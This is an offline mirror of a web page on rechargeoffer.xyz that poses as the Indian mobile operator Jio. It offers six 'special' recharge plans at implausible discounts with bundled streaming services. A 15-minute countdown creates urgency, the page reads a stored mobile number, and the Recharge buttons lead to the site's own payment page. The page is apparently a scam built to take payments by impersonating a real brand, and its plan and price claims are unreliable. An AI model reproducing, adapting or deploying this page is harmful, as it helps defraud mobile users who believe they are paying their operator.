
<html lang="en">


<!-- Mirrored from rechargeoffer.xyz/offer.php?rechargenumber=VI by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 27 Jun 2024 08:11:32 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
    <meta charset="utf-8">
    <link rel="icon" href="assets/favicon.html">
    <link rel="apple-touch-icon" href="assets/favicon.html">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <meta name="theme-color" content="#000000">
    <meta name="description" content="Web site created using create-react-app">
    <title>Jio - Best Prepaid, Postpaid Plans</title>
    <link href="static/css/main.34fbeb72.css" rel="stylesheet">
    <!-- Meta Pixel Code -->
<script>
!function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window, document,'script',
'connect.facebook.net/en_US/fbevents.html');
fbq('init', '799570449001058');
fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none"
src="www.facebook.com/trf8a7.html?id=799570449001058&amp;ev=PageView&amp;noscript=1"
/></noscript>
<!-- End Meta Pixel Code -->    <style>
        .bg-slate-200 {
            --tw-bg-opacity: 1;
            border: 1px solid #CCC;
            background-color: rgb(255 255 255);
        }
    </style>
</head>

<body>
    <div id="root">
        <div class="py-4 px-6 bg-blue-700 flex items-center justify-between text-white">
            <div class="flex items-center"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 448 512" class="text-white mr-3" height="20" width="20" xmlns="http:/www.w3.org/2000/svg">
                    <path d="M16 132h416c8.837 0 16-7.163 16-16V76c0-8.837-7.163-16-16-16H16C7.163 60 0 67.163 0 76v40c0 8.837 7.163 16 16 16zm0 160h416c8.837 0 16-7.163 16-16v-40c0-8.837-7.163-16-16-16H16c-8.837 0-16 7.163-16 16v40c0 8.837 7.163 16 16 16zm0 160h416c8.837 0 16-7.163 16-16v-40c0-8.837-7.163-16-16-16H16c-8.837 0-16 7.163-16 16v40c0 8.837 7.163 16 16 16z">
                    </path>
                </svg>
                <a href="index.html">
                    <img src="static/media/logo.830d463ac6b62d8cd9f6.png" alt="" class="w-8"></a>
            </div>
            <div class="mx-2">
                <div class="searchBar"><input id="searchQueryInput" type="text" name="searchQueryInput" placeholder="Search" value=""><button id="searchQuerySubmit" type="submit" name="searchQuerySubmit"><svg class="h-[24px] w-[24px]" viewBox="0 0 24 24">
                            <path fill="#fff" d="M9.5,3A6.5,6.5 0 0,1 16,9.5C16,11.11 15.41,12.59 14.44,13.73L14.71,14H15.5L20.5,19L19,20.5L14,15.5V14.71L13.73,14.44C12.59,15.41 11.11,16 9.5,16A6.5,6.5 0 0,1 3,9.5A6.5,6.5 0 0,1 9.5,3M9.5,5C7,5 5,7 5,9.5C5,12 7,14 9.5,14C12,14 14,12 14,9.5C14,7 12,5 9.5,5Z">
                            </path>
                        </svg></button></div>
            </div>
            <div><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 512 512" class="text-white" height="30" width="30" xmlns="http:/www.w3.org/2000/svg">
                    <path d="M399 384.2C376.9 345.8 335.4 320 288 320H224c-47.4 0-88.9 25.8-111 64.2c35.2 39.2 86.2 63.8 143 63.8s107.8-24.7 143-63.8zM0 256a256 256 0 1 1 512 0A256 256 0 1 1 0 256zm256 16a72 72 0 1 0 0-144 72 72 0 1 0 0 144z">
                    </path>
                </svg></div>
        </div>
        <div>
            <div class="flex items-center justify-center py-1 px-4 mt-2 bg-slate-100 text-[14px]">
                <div class="text-slate-700 mr-2">Special Offer Ends In:</div>
                <div class="text-slate-700 flex items-center"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 512 512" class="mr-[2px] mt-[1px]" height="1em" width="1em" xmlns="http:/www.w3.org/2000/svg">
                        <path d="M256,8C119,8,8,119,8,256S119,504,256,504,504,393,504,256,393,8,256,8Zm92.49,313h0l-20,25a16,16,0,0,1-22.49,2.5h0l-67-49.72a40,40,0,0,1-15-31.23V112a16,16,0,0,1,16-16h32a16,16,0,0,1,16,16V256l58,42.5A16,16,0,0,1,348.49,321Z">
                        </path>
                    </svg> <span id="timer">15:00</span></div>
                <script>
                    / Function to fetch text from another page (implementation depends on your approach)
                    var mobileNumber = sessionStorage.getItem('mobile_number');

                    / Display the retrieved mobile number (check if it exists)
                    if (mobileNumber) {
                        document.getElementById('mobile_number_').textContent = mobileNumber;
                    } else {
                        document.getElementById('mobile_number_').textContent = "Mobile number not found.";
                    }

                    / Call fetchText function on page load (optional)
                    / window.onload = fetchText; / Uncomment to fetch text automatically

                    let minutes = 15;
                    let seconds = 0;

                    const countdown = setInterval(() => {
                        const timerElement = document.getElementById('timer');

                        if (seconds === 0) {
                            if (minutes === 0) {
                                clearInterval(countdown);
                                timerElement.textContent = "Countdown ended!";
                                return;
                            }
                            minutes--;
                            seconds = 59;
                        } else {
                            seconds--;
                        }

                        timerElement.textContent = `${minutes.toString().padStart(2, "0")}:${seconds.toString().padStart(2, "0")}`;
                    }, 1000); / Start the timer on page load
                </script>

            </div>
            <div class="pb-8 pt-6 px-4">
                <h1 class="text-[30px] font-bold">Special Offer Plans</h1>
                <h2 class="text-[20px] font-semibold mt-2">Recommended(6)</h2>

                <div class="plans">

                    <div class="bg-slate-200 rounded-3xl p-4 my-8">
                        <!-- <div class="bg-slate-700 py-1 px-3 rounded text-white text-[14px] font-bold w-fit">SPECIAL</div> -->
                        <div class="flex items-center justify-between my-2">
                            <div class="flex items-center text-[20px] font-bold text-slate-800">
                                <div>₹149</div>
                                <div class="ml-4 line-through text-slate-600">₹666</div>
                            </div>
                            <div>
                                <img src="static/media/5g.eec5aabd88995f7798a04639984c429a.svg" alt="">
                            </div>
                        </div>
                        <div class="text-[12px] text-blue-700 font-bold">View Details</div>
                        <div class="flex items-center justify-between mt-3" style="gap: 15px;flex-flow: wrap;">
                            <div class="">
                                <div class="text-slate-600 text-[14px]">VALIDITY</div>
                                <div class="text-slate-800 text-[16px] font-bold">84 days</div>
                            </div>
                            <div class="">
                                <div class="text-slate-600 text-[14px]">DATA</div>
                                <div class="text-slate-800 text-[16px] font-bold">1.5 GB/day</div>
                            </div>
                            <div class="">
                                <div class="text-slate-600 text-[14px]">Voice</div>
                                <div class="text-slate-800 text-[16px] font-bold">Unlimited</div>
                            </div>
                            <div class="">
                                <div class="text-slate-600 text-[14px]">SMS</div>
                                <div class="text-slate-800 text-[16px] font-bold">100/day</div>
                            </div>
                        </div>
                        <div class="text-slate-600 text-[14px] mt-3">SUBSCRIPTIONS</div>
                        <div class="flex items-center mt-2">
                            <img src="static/media/jiotv.8e7e6222dc1ea51efc2e77f97aa6c599.svg" alt="" class="h-8 mx-1">
                            <img src="static/media/jiocinema.66df7a482c97ad75dfba81ca3e428215.svg" alt="" class="h-8 mx-1">
                        </div>
                        <div class="mt-5">
                            <button class="bg-[#0a2885] py-2 w-full text-[16px] rounded-full font-bold text-white" onclick="goTopaymentPage('149')">Recharge</button>
                        </div>
                    </div>


                    <div class="bg-slate-200 rounded-3xl p-4 my-8">
                        <!-- <div class="bg-slate-700 py-1 px-3 rounded text-white text-[14px] font-bold w-fit">SPECIAL</div> -->
                        <div class="flex items-center justify-between my-2">
                            <div class="flex items-center text-[20px] font-bold text-slate-800">
                                <div>₹199</div>
                                <div class="ml-4 line-through text-slate-600">₹1099</div>
                            </div>
                            <div>
                                <img src="static/media/5g.eec5aabd88995f7798a04639984c429a.svg" alt="">
                            </div>
                        </div>
                        <div class="text-[12px] text-blue-700 font-bold">View Details</div>
                        <div class="flex items-center justify-between mt-3" style="gap: 15px;flex-flow: wrap;">
                            <div class="">
                                <div class="text-slate-600 text-[14px]">VALIDITY</div>
                                <div class="text-slate-800 text-[16px] font-bold">84 days</div>
                            </div>
                            <div class="">
                                <div class="text-slate-600 text-[14px]">DATA</div>
                                <div class="text-slate-800 text-[16px] font-bold">2 GB/day</div>
                            </div>
                            <div class="">
                                <div class="text-slate-600 text-[14px]">Voice</div>
                                <div class="text-slate-800 text-[16px] font-bold">Unlimited</div>
                            </div>
                            <div class="">
                                <div class="text-slate-600 text-[14px]">SMS</div>
                                <div class="text-slate-800 text-[16px] font-bold">100/day</div>
                            </div>
                        </div>
                        <div class="text-slate-600 text-[14px] mt-3">SUBSCRIPTIONS</div>
                        <div class="flex items-center mt-2">
                            <img src="static/media/jiotv.8e7e6222dc1ea51efc2e77f97aa6c599.svg" alt="" class="h-8 mx-1">
                            <img src="static/media/jiocinema.66df7a482c97ad75dfba81ca3e428215.svg" alt="" class="h-8 mx-1">
                            <img src="static/media/Jiosavan.924b1ff95bde48240ef7007ee9471b33.svg" alt="" class="h-8 mx-1">
                        </div>
                        <div class="mt-5">
                            <button onclick="goTopaymentPage('199')" class="bg-[#0a2885] py-2 w-full text-[16px] rounded-full font-bold text-white">Recharge</button>
                        </div>
                    </div>


                    <div class="bg-slate-200 rounded-3xl p-4 my-8">
                        <div class="bg-slate-700 py-1 px-3 rounded text-white text-[14px] font-bold w-fit">SPECIAL</div>
                        <div class="flex items-center justify-between my-2">
                            <div class="flex items-center text-[20px] font-bold text-slate-800">
                                <div>₹249</div>
                                <div class="ml-4 line-through text-slate-600">₹1499</div>
                            </div>
                            <div>
                                <img src="static/media/5g.eec5aabd88995f7798a04639984c429a.svg" alt="">
                            </div>
                        </div>
                        <div class="text-[12px] text-blue-700 font-bold">View Details</div>
                        <div class="flex items-center justify-between mt-3" style="gap: 15px;flex-flow: wrap;">
                            <div class="">
                                <div class="text-slate-600 text-[14px]">VALIDITY</div>
                                <div class="text-slate-800 text-[16px] font-bold">84 days</div>
                            </div>
                            <div class="">
                                <div class="text-slate-600 text-[14px]">DATA</div>
                                <div class="text-slate-800 text-[16px] font-bold">3 GB/day</div>
                            </div>
                            <div class="">
                                <div class="text-slate-600 text-[14px]">Voice</div>
                                <div class="text-slate-800 text-[16px] font-bold">Unlimited</div>
                            </div>
                            <div class="">
                                <div class="text-slate-600 text-[14px]">SMS</div>
                                <div class="text-slate-800 text-[16px] font-bold">100/day</div>
                            </div>
                        </div>
                        <div class="text-slate-600 text-[14px] mt-3">SUBSCRIPTIONS</div>
                        <div class="flex items-center mt-2">
                            <img src="static/media/jiotv.8e7e6222dc1ea51efc2e77f97aa6c599.svg" alt="" class="h-8 mx-1">
                            <img src="static/media/jiocinema.66df7a482c97ad75dfba81ca3e428215.svg" alt="" class="h-8 mx-1">
                            <img src="static/media/Jiosavan.924b1ff95bde48240ef7007ee9471b33.svg" alt="" class="h-8 mx-1">
                            <img src="static/media/jiocloud.600c8b2a77d8062660a6f43e43aed83e.svg" alt="" class="h-8 mx-1">
                            <img src="static/media/netflix.f9c70f03e069e4dea9cdf1be341212a3.svg" alt="" class="h-8 mx-1">
                            <img src="static/media/amazonprime.02094014b1e530745456a11eaa454cd8.svg" alt="" class="h-8 mx-1">
                        </div>
                        <div class="mt-5">
                            <button onclick="goTopaymentPage('249')" class="bg-[#0a2885] py-2 w-full text-[16px] rounded-full font-bold text-white">Recharge</button>
                        </div>
                    </div>

                    <div class="bg-slate-200 rounded-3xl p-4 my-8">
                        <div class="bg-slate-700 py-1 px-3 rounded text-white text-[14px] font-bold w-fit">SPECIAL</div>
                        <div class="flex items-center justify-between my-2">
                            <div class="flex items-center text-[20px] font-bold text-slate-800">
                                <div>₹449</div>
                                <div class="ml-4 line-through text-slate-600">₹1999</div>
                            </div>
                            <div>
                                <img src="static/media/5g.eec5aabd88995f7798a04639984c429a.svg" alt="">
                            </div>
                        </div>
                        <div class="text-[12px] text-blue-700 font-bold">View Details</div>
                        <div class="flex items-center justify-between mt-3" style="gap: 15px;flex-flow: wrap;">
                            <div class="">
                                <div class="text-slate-600 text-[14px]">VALIDITY</div>
                                <div class="text-slate-800 text-[16px] font-bold">6 month</div>
                            </div>
                            <div class="">
                                <div class="text-slate-600 text-[14px]">DATA</div>
                                <div class="text-slate-800 text-[16px] font-bold">2 GB/day</div>
                            </div>
                            <div class="">
                                <div class="text-slate-600 text-[14px]">Voice</div>
                                <div class="text-slate-800 text-[16px] font-bold">Unlimited</div>
                            </div>
                            <div class="">
                                <div class="text-slate-600 text-[14px]">SMS</div>
                                <div class="text-slate-800 text-[16px] font-bold">100/day</div>
                            </div>
                        </div>
                        <div class="text-slate-600 text-[14px] mt-3">SUBSCRIPTIONS</div>
                        <div class="flex items-center mt-2">
                            <img src="static/media/jiotv.8e7e6222dc1ea51efc2e77f97aa6c599.svg" alt="" class="h-8 mx-1">
                            <img src="static/media/jiocinema.66df7a482c97ad75dfba81ca3e428215.svg" alt="" class="h-8 mx-1">
                            <img src="static/media/Jiosavan.924b1ff95bde48240ef7007ee9471b33.svg" alt="" class="h-8 mx-1">
                            <img src="static/media/jiocloud.600c8b2a77d8062660a6f43e43aed83e.svg" alt="" class="h-8 mx-1">
                            <img src="static/media/netflix.f9c70f03e069e4dea9cdf1be341212a3.svg" alt="" class="h-8 mx-1">
                            <img src="static/media/amazonprime.02094014b1e530745456a11eaa454cd8.svg" alt="" class="h-8 mx-1">
                            <img src="static/media/disney.ea90bb800d589c1c595641419b098bff.svg" alt="" class="h-8 mx-1">
                        </div>
                        <div class="mt-5">
                            <button onclick="goTopaymentPage('499')" class="bg-[#0a2885] py-2 w-full text-[16px] rounded-full font-bold text-white">Recharge</button>
                        </div>
                    </div>

                    <div class="bg-slate-200 rounded-3xl p-4 my-8">
                        <div class="bg-slate-700 py-1 px-3 rounded text-white text-[14px] font-bold w-fit">SPECIAL</div>
                        <div class="flex items-center justify-between my-2">
                            <div class="flex items-center text-[20px] font-bold text-slate-800">
                                <div>₹699</div>
                                <div class="ml-4 line-through text-slate-600">₹2499</div>
                            </div>
                            <div>
                                <img src="static/media/5g.eec5aabd88995f7798a04639984c429a.svg" alt="">
                            </div>
                        </div>
                        <div class="text-[12px] text-blue-700 font-bold">View Details</div>
                        <div class="flex items-center justify-between mt-3" style="gap: 15px;flex-flow: wrap;">
                            <div class="">
                                <div class="text-slate-600 text-[14px]">VALIDITY</div>
                                <div class="text-slate-800 text-[16px] font-bold">12 month</div>
                            </div>
                            <div class="">
                                <div class="text-slate-600 text-[14px]">DATA</div>
                                <div class="text-slate-800 text-[16px] font-bold">2 GB/day</div>
                            </div>
                            <div class="">
                                <div class="text-slate-600 text-[14px]">Voice</div>
                                <div class="text-slate-800 text-[16px] font-bold">Unlimited</div>
                            </div>
                            <div class="">
                                <div class="text-slate-600 text-[14px]">SMS</div>
                                <div class="text-slate-800 text-[16px] font-bold">100/day</div>
                            </div>
                        </div>
                        <div class="text-slate-600 text-[14px] mt-3">SUBSCRIPTIONS</div>
                        <div class="flex items-center mt-2">
                            <img src="static/media/jiotv.8e7e6222dc1ea51efc2e77f97aa6c599.svg" alt="" class="h-8 mx-1">
                            <img src="static/media/jiocinema.66df7a482c97ad75dfba81ca3e428215.svg" alt="" class="h-8 mx-1">
                            <img src="static/media/Jiosavan.924b1ff95bde48240ef7007ee9471b33.svg" alt="" class="h-8 mx-1">
                            <img src="static/media/jiocloud.600c8b2a77d8062660a6f43e43aed83e.svg" alt="" class="h-8 mx-1">
                            <img src="static/media/netflix.f9c70f03e069e4dea9cdf1be341212a3.svg" alt="" class="h-8 mx-1">
                            <img src="static/media/amazonprime.02094014b1e530745456a11eaa454cd8.svg" alt="" class="h-8 mx-1">
                            <img src="static/media/disney.ea90bb800d589c1c595641419b098bff.svg" alt="" class="h-8 mx-1">
                        </div>
                        <div class="flex items-center mt-2">
                            <img src="static/media/sony.193d9dc4f08b3c8295da239d3d3f6df9.svg" alt="" class="h-8 mx-1">
                        </div>
                        <div class="mt-5">
                            <button onclick="goTopaymentPage('699')" class="bg-[#0a2885] py-2 w-full text-[16px] rounded-full font-bold text-white">Recharge</button>
                        </div>
                    </div>

                    <div class="bg-slate-200 rounded-3xl p-4 my-8">
                        <div class="bg-slate-700 py-1 px-3 rounded text-white text-[14px] font-bold w-fit">SPECIAL</div>
                        <div class="flex items-center justify-between my-2">
                            <div class="flex items-center text-[20px] font-bold text-slate-800">
                                <div>₹999</div>
                                <div class="ml-4 line-through text-slate-600">₹3999</div>
                            </div>
                            <div>
                                <img src="static/media/5g.eec5aabd88995f7798a04639984c429a.svg" alt="">
                            </div>
                        </div>
                        <div class="text-[12px] text-blue-700 font-bold">View Details</div>
                        <div class="flex items-center justify-between mt-3" style="gap: 15px;flex-flow: wrap;">
                            <div class="">
                                <div class="text-slate-600 text-[14px]">VALIDITY</div>
                                <div class="text-slate-800 text-[16px] font-bold">12 month</div>
                            </div>
                            <div class="">
                                <div class="text-slate-600 text-[14px]">DATA</div>
                                <div class="text-slate-800 text-[16px] font-bold">3 GB/day</div>
                            </div>
                            <div class="">
                                <div class="text-slate-600 text-[14px]">Voice</div>
                                <div class="text-slate-800 text-[16px] font-bold">Unlimited</div>
                            </div>
                            <div class="">
                                <div class="text-slate-600 text-[14px]">SMS</div>
                                <div class="text-slate-800 text-[16px] font-bold">100/day</div>
                            </div>
                        </div>
                        <div class="text-slate-600 text-[14px] mt-3">SUBSCRIPTIONS</div>
                        <div class="flex items-center mt-2">
                            <img src="static/media/jiotv.8e7e6222dc1ea51efc2e77f97aa6c599.svg" alt="" class="h-8 mx-1">
                            <img src="static/media/jiocinema.66df7a482c97ad75dfba81ca3e428215.svg" alt="" class="h-8 mx-1">
                            <img src="static/media/Jiosavan.924b1ff95bde48240ef7007ee9471b33.svg" alt="" class="h-8 mx-1">
                            <img src="static/media/jiocloud.600c8b2a77d8062660a6f43e43aed83e.svg" alt="" class="h-8 mx-1">
                            <img src="static/media/netflix.f9c70f03e069e4dea9cdf1be341212a3.svg" alt="" class="h-8 mx-1">
                            <img src="static/media/amazonprime.02094014b1e530745456a11eaa454cd8.svg" alt="" class="h-8 mx-1">
                            <img src="static/media/disney.ea90bb800d589c1c595641419b098bff.svg" alt="" class="h-8 mx-1">
                        </div>
                        <div class="flex items-center mt-2">
                            <img src="static/media/sony.193d9dc4f08b3c8295da239d3d3f6df9.svg" alt="" class="h-8 mx-1">
                            <img src="static/media/zee5.db51e521df5d4a687c217324ad7b53a3.svg" alt="" class="h-8 mx-1">
                        </div>
                        <div class="mt-5">
                            <button onclick="goTopaymentPage('999')" class="bg-[#0a2885] py-2 w-full text-[16px] rounded-full font-bold text-white">Recharge</button>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</body>
<script>
    function goTopaymentPage(Id) {
        window.location.href = "payment5445.html?id=" + Id;
    }
</script>


<!-- Mirrored from rechargeoffer.xyz/offer.php?rechargenumber=VI by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 27 Jun 2024 08:11:36 GMT -->
</html>